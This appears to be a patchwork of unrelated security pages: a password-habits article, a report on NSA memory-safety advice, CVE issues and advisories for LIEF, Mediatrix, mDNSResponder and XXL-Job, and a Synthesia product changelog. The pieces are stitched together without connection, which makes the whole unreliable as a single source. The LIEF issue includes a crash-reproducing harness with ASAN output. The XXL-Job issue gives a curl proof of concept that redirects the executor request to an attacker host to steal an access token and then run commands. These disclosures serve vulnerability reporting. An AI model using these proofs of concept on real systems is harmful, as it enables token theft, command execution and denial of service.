By Waqas
ExpressVPN’s study on the most common passwords around the world showed that 42% of people use their first name in their passwords, while 43% of them use their birth date.
This is a post from HackRead.com Read the original post: Study shows that 42% of people use their names in passwords

Password theft can make life significantly more difficult. Aside from benign major hassle, compromised passwords can easily lead to identity theft and cause serious legal issues. Therefore, it is worth paying attention to the strength of your passwords and changing them regularly or, at the latest, when you suspect your accounts have been compromised.

ExpressVPN’s study on the most common passwords around the world showed that 42% of people use their first name in their passwords, while 43% of them use their birth date. Since this information is easily traceable on social media, your accounts can be more prone to hacking attacks.

**How can someone find out my password?**

A compromised password allows unauthorized people to log into your accounts. Password compromise is usually not your fault; your data is not directly compromised on a specific computer. There’s no reason to automatically assume that an attacker has accessed or hacked your computer and is still watching it (these thoughts are only appropriate if you find that multiple passwords have been compromised in a relatively short period of time).

The most common reason is the theft of user’s personal data from various services. It is also conceivable that attackers could hack and obtain a database of users of a certain service (a so-called “Breach”) and then publish it. The password is then sold on the black market and can in fact be read by anyone. 

**How to protect yourself****Checking for fraudulent use**

You can easily check your password online. Take a look at the publicly available tools that can do this. Most of them work automatically and can send an alert when you enter your email address if they detect a leak or incident (containing your email address or password) as mentioned above.

The best-known monitoring tool is ”have I been pwned”. Here, after entering your email address, you can see which services or providers have been hacked and which user accounts have been compromised. If your account is listed, consider your password hacked and change it urgently. It is clear which one it is by looking at your password, even if it is not naturally displayed.

You can type the password directly into the Pwned Passwords tool (instead of looking for the associated email). The result is a notification of whether the password was part of a data breach and how many times it happened. The database contains over 613 million compromised passwords that have previously been proven to have been stolen.

Other password compromise checking services:

*   F-Secure
*   Firefox Monitor
*   Chrome browser
*   Avast Hack Check
*   Mirkat for Lenovo

**Discover weak and duplicated passwords at the administrator or keychain**

Password compromise detection or password weakness alerts should be available in any decent password manager. We’ve already covered them in our magazine, and you can find the best-known ones in a dedicated password managers section.

On some systems, passwords are stored in keychains that support the features mentioned above; for example, on iOS (iPhone) and macOS, the keychain warns if a password is weak or repeated across multiple services. Since iOS 14 and macOS Big Sur, the keychain can also keep track of compromised passwords. If your saved password has an exclamation mark icon next to it, you should change it right away.

1.  List of 2020’s most used passwords is here and it’s appalling
2.  Revealed: The 200 Most used and Worst Passwords of 2021
3.  Chrome on Android will alert, fix your compromised password
4.  Psst! tool by 1Password lets users share passwords using a link
5.  Nissan source code leaked, it used “admin” as username, password

**Use a password manager**

The average internet user uses so many services and apps that if they had to use unique passwords for each one, they would not be able to remember them. So, if you don’t want to give up security completely and use a single password, we recommend using a password manager.

Password managers may even suggest strong passwords, which is something to consider. Password suggestions are also built into some browsers or password manager plug-ins allow this feature. Artificial intelligence can judge better than the user what is a suitable and strong password.

The default setting for cloud-based password managers is to log in with 2FA. If you use a password manager on your phone, it usually has biometrics – fingerprint or facial recognition. This adds another layer of security to password access.

**Ustwo-factor authentication**

We regularly cover two-factor authentication (2FA) in our magazine, so the term is certainly not new to you. Simply put, 2FA adds an extra layer of protection to your login, so a simple password is no longer enough. To log in, you will still need to enter a one-time password (OTP), which is generated separately on the device you have. This is usually an app on your smartphone that shows you an OTP password for each “paired” service, which is valid for a very short period.

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Study shows that 42% of people use their names in passwords

Languages such as C and C++ rely too heavily on the programmer not making simple memory-related security errors.

Security analysts welcomed a recommendation from the US National Security Agency (NSA) last week for software developers to consider adopting languages, such as C#, Go, Java, Ruby, Rust, and Swift, that reduce memory-related vulnerabilities in code.

The NSA described these as "memory-safe" languages that manage memory automatically as part of the computer language. They do not rely on the programmer to implement memory security and instead use a combination of compile time and runtime checks to protect against memory errors, the NSA said.

**The Case for Memory-Safe Languages**

The NSA's somewhat unusual advisory on Nov. 10 pointed to widely used languages such as C and C++ as relying too heavily on programmers not to make memory-related mistakes, which it noted continues to be the top cause for security vulnerabilities in software. Previous studies — one by Microsoft in 2019 and another from Google in 2020 related to its Chrome browser, for instance — found 70% of vulnerabilities were memory-safety issues, the NSA said.

"Commonly used languages, such as C and C++, provide a lot of freedom and flexibility in memory management while relying heavily on the programmer to perform the needed checks on memory references," the NSA said. This often results in exploitable vulnerabilities tied to simple mistakes such as buffer overflow errors, memory allocation issues, and race conditions.

C#, Go, Java, Ruby, Rust, Swift, and other memory-safe languages do not completely eliminate the risk of these issues, the NSA said in its advisory. Most of them, for instance, include at least a few classes or functions that aren't memory-safe and allow the programmer to perform a potentially unsafe memory management function. Memory-safe languages can sometimes also include libraries written in languages that contain potentially unsafe memory functions.

But even with these caveats, memory-safe languages can help reduce vulnerabilities in software resulting from poor and careless memory management, the NSA said.

Tim Mackey, principal security strategist at Synopsys Cybersecurity Research Center, welcomes the NSA's recommendation. The use of memory-safe languages should, in fact, be the default for most applications, he says.

"For practical purposes, relying on developers to focus on memory management issues instead of programming cool, new features represents a tax on innovation," he says.

With memory-safe programming languages and associated frameworks, it is the authors of the language that ensure proper memory management and not the application developers, Mackey says.

**Shift Can Be Challenging**

Shifting a mature software development environment from one language to another can be hard, the NSA acknowledged. Programmers will need to learn the new language, and there are likely going to be newbie mistakes and efficiency hits during the process. The extent of memory security that is available can also vary significantly by language. Some might offer only minimal memory security, while others offer considerable protections around memory access, allocation, and management.

In addition, organizations will need to consider how much of a tradeoff they are willing to make between security and performance. "Memory safety can be costly in performance and flexibility," the NSA warned. "For languages with an extreme level of inherent protection, considerable work may be needed to simply get the program to compile due to the checks and protections."

Myriad variables are in play when trying to port an application from one language to another, says Mike Parkin, senior technical engineer at Vulcan Cyber.

"In a best-case scenario, the shift is simple and an organization can accomplish it relatively painlessly," Parkin says. "In others, the application relies on features that are trivial in the original language but require extensive and expensive development to re-create in the new one."

The use of memory-safe languages also doesn't replace the need for proper software testing, Mackey cautions. Just because a programming language is memory-safe doesn't mean the language or applications developed on it are free from bugs.

Moving from one programming language to another is a risky proposition unless you have staff that already understands both the old language and the new one, Mackey says.

"Such a migration is best done when the application is going through a major version update," he notes. "Otherwise there is the potential that inadvertent bugs are introduced as part of the migration effort."

Mackey suggests that organizations consider using microservices when it comes to shifting languages.

"With a microservices architecture, the application is decomposed into a set of services that are containerized," Mackey says. "From the perspective of a programming language, there is nothing that inherently requires that each microservice be programmed in the same programming language as other services within the same application."

**Making the Move**

Recent data from Statista shows that many developers are already using languages that are considered memory-safe. For instance, nearly two-thirds (65.6%) use JavaScript, nearly half (48.06%) use Python, one-third use Java, and nearly 28% use C#. At the same time, a substantial proportion are still using unsafe languages, such as C++ (22.5%) and C (19.25%).

"I think many organizations have already been switching away from C/C++ not only for the memory-safety issue, but also for the overall ease of development and maintenance," says Johannes Ullrich, dean of research at the SANS Technology Institute. "But there will still be legacy code bases that will have to be maintained for many years to come."

NSA's advisory offered little insight into what might have prompted its recommendation at this juncture. But John Bambenek, principal threat hunter at Netenrich, advises organizations not to ignore it.

"Memory vulnerabilities and attacks have been pervasive since the 1990s, so in general, this is good advice," he says. "With that being said, as this is coming from the NSA, I believe this advice should take added urgency and is being driven by knowledge they have and we don't."

Analysts Welcome NSA's Advice for Developers to Adopt Memory-Safe Languages

A heap buffer overflow in the LIEF::MachO::BinaryParser::parse_dyldinfo_generic_bind function of LIEF v0.12.1 allows attackers to cause a Denial of Service (DoS) via a crafted MachO file.

**Describe the bug**  
A bad macho file which can lead LIEF::MachO::Parser::parse() to a heap-buffer-overflow(read) issue.  
Poc here :  
poc1.zip

**To Reproduce**

1.  Build the whole project with **ASAN**
2.  Drive program (compile it with **ASAN** too):

// read\_mecho.c
#include <LIEF/LIEF.hpp\>

int main(int argc, char\*\* argv){
	
	if(argc != 2) return 0;

	try {
	    std::unique\_ptr<LIEF::MachO::FatBinary> macho = LIEF::MachO::Parser::parse(argv\[1\]);
	} catch (const LIEF::exception& err) {
	    std::cerr << err.what() << std::endl;
	}

	return 0;
}

3.  Run Poc:

$ ./read\_macho ./poc1.bin

**Expected behavior**  
The code snippet where the issue happened should avoid the out-bounds read operation.

**Environment (please complete the following information):**

*   System and Version : Ubuntu 20.04 + gcc 9.4.0
*   Target format : **Mach-O**
*   LIEF commit version: ad81191

**Additional context**  
ASAN says:

    ubuntu@ubuntu:~/test/LIEF/fuzz$ ./read_macho poc1.bin
    nlist[0].str_idx seems corrupted (0xaf000000)
    nlist[1].str_idx seems corrupted (0xaf000000)
    ......
    nlist[355].str_idx seems corrupted (0x3d000001)
    Indirect symbol index is out of range (1493172225 vs max sym: 356)
    Wrong index: 4
    Wrong index: 4
    Wrong index: 4
    Wrong index: 4
    Wrong index: 4
    Wrong index: 4
    Wrong index: 4
    Wrong index: 4
    Wrong index: 4
    =================================================================
    ==502744==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000000420 at pc 0x55b43d8d9b42 bp 0x7ffe61a9cf10 sp 0x7ffe61a9cf00
    READ of size 8 at 0x603000000420 thread T0
        #0 0x55b43d8d9b41 in std::enable_if<std::is_pointer<LIEF::MachO::SegmentCommand*>::value, LIEF::MachO::SegmentCommand&>::type LIEF::ref_iterator<std::vector<LIEF::MachO::SegmentCommand*, std::allocator<LIEF::MachO::SegmentCommand*> >&, LIEF::MachO::SegmentCommand*, __gnu_cxx::__normal_iterator<LIEF::MachO::SegmentCommand**, std::vector<LIEF::MachO::SegmentCommand*, std::allocator<LIEF::MachO::SegmentCommand*> > > >::operator*<LIEF::MachO::SegmentCommand*>() const /home/ubuntu/test/LIEF/include/LIEF/iterators.hpp:233
        #1 0x55b43d8bf315 in LIEF::ref_iterator<std::vector<LIEF::MachO::SegmentCommand*, std::allocator<LIEF::MachO::SegmentCommand*> >&, LIEF::MachO::SegmentCommand*, __gnu_cxx::__normal_iterator<LIEF::MachO::SegmentCommand**, std::vector<LIEF::MachO::SegmentCommand*, std::allocator<LIEF::MachO::SegmentCommand*> > > >::operator*() /home/ubuntu/test/LIEF/include/LIEF/iterators.hpp:226
        #2 0x55b43d892a91 in LIEF::ref_iterator<std::vector<LIEF::MachO::SegmentCommand*, std::allocator<LIEF::MachO::SegmentCommand*> >&, LIEF::MachO::SegmentCommand*, __gnu_cxx::__normal_iterator<LIEF::MachO::SegmentCommand**, std::vector<LIEF::MachO::SegmentCommand*, std::allocator<LIEF::MachO::SegmentCommand*> > > >::operator[](unsigned long) const /home/ubuntu/test/LIEF/include/LIEF/iterators.hpp:146
        #3 0x55b43d858628 in LIEF::ref_iterator<std::vector<LIEF::MachO::SegmentCommand*, std::allocator<LIEF::MachO::SegmentCommand*> >&, LIEF::MachO::SegmentCommand*, __gnu_cxx::__normal_iterator<LIEF::MachO::SegmentCommand**, std::vector<LIEF::MachO::SegmentCommand*, std::allocator<LIEF::MachO::SegmentCommand*> > > >::operator[](unsigned long) /home/ubuntu/test/LIEF/include/LIEF/iterators.hpp:133
        #4 0x55b43d8644a2 in boost::leaf::result<LIEF::ok_t> LIEF::MachO::BinaryParser::parse_dyldinfo_generic_bind<LIEF::MachO::details::MachO32>() /home/ubuntu/test/LIEF/src/MachO/BinaryParser.tcc:1629
        #5 0x55b43d831a79 in boost::leaf::result<LIEF::ok_t> LIEF::MachO::BinaryParser::parse_dyldinfo_binds<LIEF::MachO::details::MachO32>() /home/ubuntu/test/LIEF/src/MachO/BinaryParser.tcc:1357
        #6 0x55b43d801735 in boost::leaf::result<LIEF::ok_t> LIEF::MachO::BinaryParser::parse<LIEF::MachO::details::MachO32>() /home/ubuntu/test/LIEF/src/MachO/BinaryParser.tcc:113
        #7 0x55b43d7f2348 in LIEF::MachO::BinaryParser::init_and_parse() /home/ubuntu/test/LIEF/src/MachO/BinaryParser.cpp:145
        #8 0x55b43d7f1ab0 in LIEF::MachO::BinaryParser::parse(std::unique_ptr<LIEF::BinaryStream, std::default_delete<LIEF::BinaryStream> >, unsigned long, LIEF::MachO::ParserConfig const&) /home/ubuntu/test/LIEF/src/MachO/BinaryParser.cpp:125
        #9 0x55b43d07bc01 in LIEF::MachO::Parser::build() /home/ubuntu/test/LIEF/src/MachO/Parser.cpp:174
        #10 0x55b43d078995 in LIEF::MachO::Parser::parse(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, LIEF::MachO::ParserConfig const&) /home/ubuntu/test/LIEF/src/MachO/Parser.cpp:64
        #11 0x55b43cee3923 in main /home/ubuntu/test/LIEF/fuzz/read_macho.c:8
        #12 0x7f2be6489082 in __libc_start_main ../csu/libc-start.c:308
        #13 0x55b43cee355d in _start (/home/ubuntu/test/LIEF/fuzz/read_macho+0x33055d)
    
    0x603000000420 is located 0 bytes to the right of 32-byte region [0x603000000400,0x603000000420)
    allocated by thread T0 here:
        #0 0x7f2be6ab2587 in operator new(unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cc:104
        #1 0x55b43d7d7c50 in __gnu_cxx::new_allocator<LIEF::MachO::SegmentCommand*>::allocate(unsigned long, void const*) /usr/include/c++/9/ext/new_allocator.h:114
        #2 0xfffcc353843  (<unknown module>)
        #3 0x7ffe61a9deef  ([stack]+0x1deef)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/ubuntu/test/LIEF/include/LIEF/iterators.hpp:233 in std::enable_if<std::is_pointer<LIEF::MachO::SegmentCommand*>::value, LIEF::MachO::SegmentCommand&>::type LIEF::ref_iterator<std::vector<LIEF::MachO::SegmentCommand*, std::allocator<LIEF::MachO::SegmentCommand*> >&, LIEF::MachO::SegmentCommand*, __gnu_cxx::__normal_iterator<LIEF::MachO::SegmentCommand**, std::vector<LIEF::MachO::SegmentCommand*, std::allocator<LIEF::MachO::SegmentCommand*> > > >::operator*<LIEF::MachO::SegmentCommand*>() const
    Shadow bytes around the buggy address:
      0x0c067fff8030: fa fa 00 00 01 fa fa fa 00 00 01 fa fa fa fd fd
      0x0c067fff8040: fd fd fa fa fd fd fd fd fa fa 00 00 01 fa fa fa
      0x0c067fff8050: 00 00 01 fa fa fa 00 00 01 fa fa fa 00 00 01 fa
      0x0c067fff8060: fa fa 00 00 01 fa fa fa 00 00 01 fa fa fa 00 00
      0x0c067fff8070: 01 fa fa fa 00 00 01 fa fa fa 00 00 01 fa fa fa
    =>0x0c067fff8080: 00 00 00 00[fa]fa 00 00 01 fa fa fa 00 00 01 fa
      0x0c067fff8090: fa fa 00 00 01 fa fa fa 00 00 01 fa fa fa 00 00
      0x0c067fff80a0: 01 fa fa fa 00 00 01 fa fa fa fd fd fd fd fa fa
      0x0c067fff80b0: 00 00 01 fa fa fa 00 00 01 fa fa fa 00 00 01 fa
      0x0c067fff80c0: fa fa 00 00 01 fa fa fa 00 00 01 fa fa fa 00 00
      0x0c067fff80d0: 01 fa fa fa 00 00 01 fa fa fa 00 00 01 fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==502744==ABORTING

CVE-2022-43171: Heap-buffer-overflow in LIEF::MachO::BinaryParser::parse_dyldinfo_generic_bind at MachO/BinaryParser.tcc:1629 · Issue #782 · lief-project/LIEF

Mediatrix 4102 before v48.5.2718 allows local attackers to gain root access via the UART port.

DGW Application 48.5.2718

*   Summary
*   Security changes

**Summary**

ID

Synopsis

DGW-14973

SIP: Support additional DHE ciphers

DGW-15007

User passwords are now securely hashed

DGW-15338

OWASP: Disable access to internal UART

DGW-15442

CVE-2022-0778: Possible Denial of Service (DoS) from purposedly crafted TLS certificate

**Security changes  
**

**DGW-15442 - CVE-2022-0778: Possible Denial of Service (DoS) from purposedly crafted TLS certificate**

An important security flaw was found in the OpenSSL library affecting DGW version 48.4 and below. If exploited successfully, this vulnerability could cause the unit to reboot unexpectedly.

The CVE-2022-0778 has been addressed by upgrading the OpenSSL library to version 1.1.1n.

**DGW-15338 - OWASP: Disable access to internal UART**

Follow OWASP IoT Verification Requirement C.1:Verify that application layer debugging interfaces such USB, UART, and other serial variants are disabled or protected by a complex password.

**DGW-15007 - User passwords are now securely hashed**

User passwords are no longer saved in clear text, but instead saved in a cryptographically secure way, using the PBKDF2-HMAC-SHA256 hash algorithm.

Previously, when exporting a backup or configuration script, the passwords could be read in clear-text. Now, only the hashed passwords are visible.

A user cannot retrieve a forgotten password anymore, since it is impossible to reverse a hashed password into a clear-text password. In case all passwords are forgotten, a partial reset or factory reset can be done to restore to the factory initial passwords.

**DGW-14973 - SIP: Support additional DHE ciphers**

The SipEp service now supports the following DHE ciphers when using SIP over TLS:

*   TLS\_DHE\_RSA\_WITH\_AES\_128\_CBC\_SHA256
*   TLS\_DHE\_RSA\_WITH\_AES\_128\_GCM\_SHA256
*   TLS\_DHE\_RSA\_WITH\_AES\_256\_CBC\_SHA256
*   TLS\_DHE\_RSA\_WITH\_AES\_256\_GCM\_SHA384

**Copyright Notice**

Copyright 2022 Media5 Corporation.

This document contains information that is proprietary to Media5 Corporation.

Media5 Corporation reserves all rights to this document as well as to the Intellectual Property of the document and the technology and know-how that it includes and represents.

This publication cannot be reproduced, neither in whole nor in part, in any form whatsoever, without written prior approval by Media5 Corporation.

Media5 Corporation reserves the right to revise this publication and make changes at any time and without the obligation to notify any person and/or entity of such revisions and/or changes.

www.media5corp.com

CVE-2022-43096: DGW Security Improvement Notes v48.5.2718 - Mediatrix

mDNSResponder.exe is vulnerable to DLL Sideloading attack. Executable improperly specifies how to load the DLL, from which folder and under what conditions. In these scenarios, a malicious attacker could be using the valid and legitimate executable to load malicious files.

**Information**

During an analysis of a targeted cyber-attack we found a malware utilizing a DLL Side-Loading (Binary Planting) vulnerability in Audinate’s Dante Discvoery.

During the incident, the malicious actor downloaded to the infected machines two files and place them under the same arbitrary directory:

1.  **mDNSResponder.exe**  
    This is an executable that is signed and shipped by Zoom as part of its product installation. The file’s signature is valid. We confirmed the file appears on the latest version of Zoom Rooms installation as downloaded from Zoom’s website.
    
2.  **dal\_keepalives.dll**  
    A malicious DLL written by the malicious actors behind the attack.
    

When executing the legit and original **mDNSResponder.exe**, the executable will load the malicious DLL “**dal\_keepalives.dll**”. This is because **mDNSResponder.exe** is vulnerable to DLL Sideloading attack. , that the executable is improperly specify how to load the DLL, from which folder and under what conditions. In these scenarios, a malicious attacker is using the valid and legitimate executable to load malicious files.

**References:**  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23748

CVE-2022-23748: CVE-2022-23748

XXL-Job before v2.3.1 contains a Server-Side Request Forgery (SSRF) via the component /admin/controller/JobLogController.java.

xxl-job =< 2.3.1 version (latest version) has SSRF vulnerability, which causes low-privileged users to control executor to execute arbitrary commands

1.  Vulnerability description  
    XXL-JOB is a distributed task scheduling platform based on java language in the XXL (XXL-JOB) community.  
    There is an SSRF vulnerability in xxl-job-2.3.1/xxl-job-admin/src/main/java/com/xxl/job/admin/controller/JobLogController.java of Xxl-job 2.3.1, which originates from /logDetailCat, it directly sends a query log request to the address specified by executorAddress without judging whether the executorAddress parameter is the valid executor address. The query request will have the XXL-JOB-ACCESS- TOKEN, resulting in the leakage of XXL-JOB-ACCESS-TOKEN, and then the attacker obtains XXL-JOB-ACCESS-TOKEN and calls any executor, causing the execution of arbitrary commands of the executor.  
    The /logDetailCat interface call only needs to be a low Privilege user of the platform。

2.Affected version  
Xxl-job-admin =< 2.3.1 （latest）

3.Proof of concept  
1、build an http server locally and print the http request header log.  
  
2、Create a normal user normal without any executor permissions。  
  
  
3、When using the normal user to call the interface, set the input parameter executor Address to the http server address in step 1, and print the XXL-JOB-ACCESS-TOKEN directly on the target server  
curl 'http://localhost:8080/xxl-job-admin/joblog/logDetailCat' \ -H 'Accept: application/json, text/javascript, */*; q=0.01' \ -H 'Accept-Language: zh-CN,zh;q=0.9' \ -H 'Connection: keep-alive' \ -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \ -H 'Cookie: Idea-6a85f0b8=3349f800-77dc-4e25-a562-885457beb2aa; XXL_JOB_LOGIN_IDENTITY=7b226964223a322c22757365726e616d65223a226e6f726d616c222c2270617373776f7264223a223563373066666266643839303065626533643037326562346162353064376162222c22726f6c65223a302c227065726d697373696f6e223a22227d' \ -H 'Origin: http://localhost:8080' \ -H 'Referer: http://localhost:8080/xxl-job-admin/' \ -H 'Sec-Fetch-Dest: empty' \ -H 'Sec-Fetch-Mode: cors' \ -H 'Sec-Fetch-Site: same-origin' \ -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36' \ -H 'X-Requested-With: XMLHttpRequest' \ -H 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"' \ -H 'sec-ch-ua-mobile: ?0' \ -H 'sec-ch-ua-platform: "macOS"' \ --data-raw 'executorAddress=http://10.224.203.118&logId=0&fromLineNum=0&triggerTime=1586629003729' \ --compressed   
  

4、Use the token to call the task trigger interface of the executor Restful API to execute arbitrary commands  

4、Recommendations  
The same as in JobLogController.java, when matching the /joblog route, it will enter the index method to judge whether the 'executorAddress executor address belongs to the executor address.

CVE-2022-43183: xxl-job =< 2.3.1 version (latest version) has SSRF vulnerability, which causes low-privileged users to control executor to execute arbitrary commands · Issue #3002 · xuxueli/xxl-job

A buffer overflow in Synthesia before 10.7.5567, when a non-Latin locale is used, allows user-assisted attackers to cause a denial of service (application crash) via a crafted MIDI file with malformed bytes. This file is mishandled during a deletion attempt. In Synthesia before 10.9, an improper path handling allows local attackers to cause a denial of service (application crash) via a crafted MIDI file with malformed bytes.

Oct 31 2021

**Synthesia 10.8**

MusicXML files can now be opened by Synthesia!

For now, none of the additional musical information (vs. a MIDI file) is being used when drawing sheet music. But MusicXML files should load, play, and sound correct. We'll be using the newly available musical information to improve the sheet music over the next several updates. If you spot something that doesn't sound correct, please let us know!

What's new in **Synthesia 10.8**:

*   MusicXML file loading.
*   Reworked full-screen sheet music navigation. (Watch the video.)
*   The song list should load about 100x faster.
*   Apple silicon support on macOS.
*   Many other fixes and improvements.

May 20 2021

**Changing Lives for 15 Years**

Synthesia has been around since before apps were called apps. Over the years, my favorite thing has been learning the different ways it has impacted the lives of its users.

Recently YouTube collected and showcased a number of stories about videos that have done the same for users of their platform. One of those stories was about a Japanese seaweed farmer that used videos of songs played in Synthesia to achieve his dreams of becoming a pianist.

It's a great story that you can watch, here. (It's in Japanese, so you may need to click the CC button at the lower-right to turn on subtitles.)

Hearing from so many of you over the years has brought no end to the gratification this project has given me. Thank you for going on this journey with me and thank you for using Synthesia!

\- Nicholas

Feb 15 2021

**Synthesia 10.7**

Simple MIDI Recording, down-stems, and new languages:

*   Added a simple multi-track recorder to the Free Play screen (when unlocked).
*   Improved sheet music: note stems are now able to point down.
*   Added three new display languages: Catalan, Turkish, and Japanese.
*   Many other fixes and improvements.

Sep 29 2019

**Synthesia 10.6**

Full-screen Sheet Music:

*   Use the new gear menu to show full-screen sheet music.
*   Navigate through the song by clicking the sheet music.
*   Bookmarks and loops are now shown in sheet music.
*   Set the number of errors before your loop restarts automatically.
*   Many other bug fixes and improvements.

Jan 29 2019

**Synthesia 10.5.1**

New settings and lots of fixes:

*   Added Thai language support.
*   Added 9 new settings to customize under Gameplay and Advanced.
*   The built-in synth (on PC and Android) now has nicer reverb.
*   Fixed high CPU usage on macOS Mojave.
*   iPad Pro 11" screen size support.
*   About a dozen other bug fixes and small improvements.

Nov 21 2018

**Synthesia 10.5**

Better sounds, iOS Files support, Android M MIDI, Chromebooks, and more!

*   Added a faster synth with better sounds for Windows and Android.
*   You can now manage your songs on the iPad with the Files app.
*   MIDI devices should now appear on compatible Chromebook models.
*   Improved Android MIDI compatibility.
*   Improved Windows 10 MIDI compatibility.
*   Many more features, bug fixes, and performance improvements.

Nov 17 2017

**Synthesia 10.4**

Sharp notation, Windows 10 MIDI, "Simple" labels, AVI export, and more!

*   Sheet music now always appears sharp, regardless of size.
*   Windows 10 MIDI support: lower latency synth and Bluetooth MIDI!
*   Support for "The ONE Smart Keyboard" key lights on iPad and Android.
*   New "Simple" labels mode that shows C, D, E, etc. on white keys only.
*   Windows version of the Video Creator now lets you export AVI files.
*   And 20+ more features and bug fixes.

Sep 13 2016

**Synthesia 10.3**

More songs, more languages, more modernization, and lots of fixes!

*   Added 5 songs from the Undertale and Five Nights at Freddy's games.
*   Added Slovenian and Polish language support.
*   Retina support for Mac, now making Synthesia HiDPI-aware everywhere.
*   Try the first 20 seconds of any song without unlocking Synthesia.
*   Plus 16 more features and 15 bug fixes.

Aug 23 2015

**Synthesia 10.2**

Synthesia 10.2 adds new conveniences and smooths a few rough edges!

*   Unlock Synthesia for Android using your key from the desktop version!
*   Discover our how-to guides using Synthesia's new help buttons.
*   Try out even more songs in trial mode.
*   Read the larger key and note labels more easily.
*   Toggle loops on/off with the "/" key.
*   Set your zoom level to "Custom", then match the screen to your keyboard.
*   Install more easily on Windows in a single click.
*   Enjoy 48 more improvements and fixes!

Jan 6 2015

**Synthesia 10.1**

Added Dutch language support and fixed 17 bugs!

Dec 19 2014

**Synthesia for Android**

If you've got an Android device that runs Android 4.1 or later, download Synthesia now:

Keyboards can be connected using USB On-The-Go cables.

Synthesia 10 adds dozens of major features!

*   Easy hand splitting for songs that were arranged as a single piano part.
*   A new Free Play area to experiment with notes, instruments, and chords.
*   See the next loop before it starts! No more sudden jumps.
*   Recently played song list on the title screen for quick navigation.
*   Italian language support.
*   Much, much more...

Synthesia 9 lets more people play than ever!

*   Multiple languages! Choose between English, Spanish, French, German, Russian, Brazilian Portuguese, and Traditional Chinese.
*   Change Synthesia's window size anytime you like.
*   Press Alt-Enter to toggle full-screen mode on any monitor.
*   Support for the new Synthesia Music Store.

Synthesia 8.6 gets things ready for the upcoming song store.

*   Lots of new metadata support for the upcoming song store.
*   Add your own background image using the configuration tool.
*   Click the score box to hide it.
*   The "Scale Number" label mode is back.
*   Over a dozen more bug fixes and improvements.

Synthesia 8.5 is a small release containing 21 bug fixes and an easier way to enter unlock keys.

There are too many improvements to list! Every single screen has been overhauled with new or improved features everywhere.

Synthesia for iPad

It's a natural fit. Put your iPad right on your keyboard's music stand.

Synthesia for iPad makes no compromises: every feature you love on the desktop has made the transition smoothly. Connect your keyboard or play using the touchscreen.

Improved On-Screen Keyboard

The menus aren't the only thing that have been improved. The keyboard and falling notes have never looked this good before.

The new graphics have been accurately modeled from a real piano. Pan left or right by dragging in the falling note area. Zoom in or out smoothly by pinching on the iPad or using the zoom menu on the desktop.

Color Themes

Not ready for so much change? Head over to the Color Themes section under Settings and switch over to the "Synthesia Classic" theme.

You can make your own themes, too. Check out the new modding forum for details. Then share your color theme with others.

So Much More...

Multiple input/output device support, smooth-scrolling song library, user profile statistics, song library auto-grouping by folder, lots of new options, helpful prompts throughout all the menus, redesigned advanced song settings, and the list keeps going!

May 16 2012

**Tips for Synthesia Songwriters**

Do you create your own songs to share with others using Synthesia?

Check out this guide that shows a few easy steps to get the most out of Synthesia's features with your own songs:

Creating Great Content for Synthesia

In just a few minutes you'll be able to add extended metadata, include finger hints, enable the simple song view, create links on your site that will open Synthesia in a single click, and more!

Apr 5 2012

**Synthesia 0.8.3**

The new song progress tracking feature is Synthesia's best feature ever. Grab Synthesia 0.8.3 now to get it along with a dozen or so new features.

Stay Motivated, Track Your Progress

Let Synthesia guide you through the process of learning every song. The new song progress metric lets you to set personal goals and watch them become realized.

Whenever you play a song, you have a chance at proving how far you've progressed in that song.

This is my new personal favorite feature.

It's Just You and the Music

Synthesia 0.8.3 brings a new, cleaner play screen. All of the clutter has been tucked into a menu at the top of the screen.

With fewer distractions and a display much friendlier to lower-resolution screens, it's just you and your music.

Launch Synthesia From Your Browser

After you run Synthesia 0.8.3 for the first time, you are ready to launch songs in a single click. Try it out: Bach Chorale.

Want to create your own Synthesia links for your website or YouTube videos? Use the Synthesia Song Link Generator tool.

New Scale and Arpeggio Exercises

Try out the new exercises by Ash from the forums. Each exercise is split into separate hands and includes finger hints. You'll find them in the song library under "Ash's Exercises".

Nov 7 2011

**Synthesia 0.8.2**

With keyboard navigation, huge improvements to the sheet display, and dozens of quality of life improvements, Synthesia 0.8.2 is the biggest release ever.

Control Everything with Your Keyboard

Customize all song controls. Fast-forward and rewind with your pitch bend wheel. Pause the song with your lowest note. Change the speed with your modulation wheel.

The sky is the limit.

Dramatically Improved Sheet Music

Follow along smoother than ever with new note and measure highlighting. Never lose your place with an easier to follow page-turn effect.

Synthesia's sheet music now supports key signatures, time signatures, staccato notes, crowded notes, better clef detection, smarter spacing, crisper staff and bar lines, and still more.

And More...

*   Keyboard settings are remembered much smarter between sessions.
*   Windowed mode on the Mac along with a better Mac install experience.
*   Automatically pause when a keyboard connection is lost.
*   Dozens of other tweaks and fixes.

Jun 6 2011

**Synthesia 0.8.1**

What's new in 0.8.1:

*   Add finger number hints to your songs in a single click. (video)
*   Finger hints included for all 100+ built-in songs.
*   Simplified track settings let you jump in fast.
*   Improved library searching to find your favorite songs quicker.
*   Many improvements in MIDI, device, and computer compatibility.
*   Tons of tweaks and fixes.

Dec 16 2010

**Synthesia on _Strictly Come Dancing_**

_Strictly Come Dancing_ is the original UK version of _Dancing with the Stars_. Each year the show puts the trainers through a crazy challenge. This season, Synthesia's falling note display was combined with a giant floor piano in the "ITT Grand Piano Challenge".

They kind of threw them to the wolves by only giving the trainers one attempt and not letting them practice ahead of time.

Check out the final two performances and award ceremony from the show.

Nov 13 2010

**Synthesia 0.8.0**

